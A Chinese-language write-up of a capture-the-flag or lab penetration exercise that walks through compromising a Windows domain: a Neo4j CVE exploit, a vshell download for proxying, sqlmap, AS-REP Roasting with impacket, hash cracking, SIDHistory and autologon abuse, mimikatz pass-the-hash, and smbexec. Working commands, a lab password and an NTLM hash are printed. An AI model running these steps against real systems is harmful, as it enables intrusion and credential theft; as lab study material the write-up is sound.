共计 1146 个字符,预计需要花费 3 分钟才能阅读完成。
渗透路径:
neo4j 打 CVE 获得立足点 ->sqlmap 梭出域环境账号 ->Kerberos AS-REP Roasting 攻击 获取加密凭证 -> 通过 SIDHistory 以及自动登录留下的凭证获取更高权限 ->pth 拿下域控
还是端口扫描
打到一半重开了一下靶机所以,IP 变了 39.98.109.138
观察靶机开放的端口,发现部署了 neo4j。
看一下,很老的版本了。直接打 CVE
https://github.com/zwjjustdoit/CVE-2021-34371.jar
java -jar ./rhino_gadget.jar rmi:// 靶机 IP:1337 "命令"
直接就拿下 flag 了
python 起个 http 服务然后下载 vshell,方便起代理和交互
用 stoaway 也行,但是我懒
fscan 传上去扫下内网
发现一个后台登录界面,直接 SQLMAP 跑一下试试
记得在 conf 文件里面配置代理
proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123"dump 出 flag 和用户
竟然有一堆账号,然后就来打另一台 Windows 机器了
Kerberos AS-REP Roasting 攻击:这是一个针对 Kerberos 认证协议的攻击方法,主要目标是尝试从 Active Directory 获取不需要预身份验证的用户的加密凭证信息。这种攻击可以尝试暴力破解密码,特别是针对没有配置 Kerberos 预身份验证的用户账户。proxychains4 impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/拿到 NTML
使用 hashcat 爆破出密码
直接 RDP 远程连接上另一台主机
使用 bloodhound 做信息搜集
SIDHistory 是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的 SID 作为该对象的 objectSid,在之前域中的 SID 会添加到该对象的 sIDHistory 属性中,此时该对象将保留在原来域的 SID 对应的访问权限
YUXUAN 是自动登录用户
可以直接找到密码
我们可以通过他登录
用 yuxuan@xiaorang.lab/Yuxuan7QbrgZ3L 重连 RDP
然后上传 mimikatz 打 pth
获取了 admin 的 hash 后使用 smbexec 取得 shell
proxychains4 python3 smbexec.py -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25 -codec gbk
然后继续 pth 拿下域控
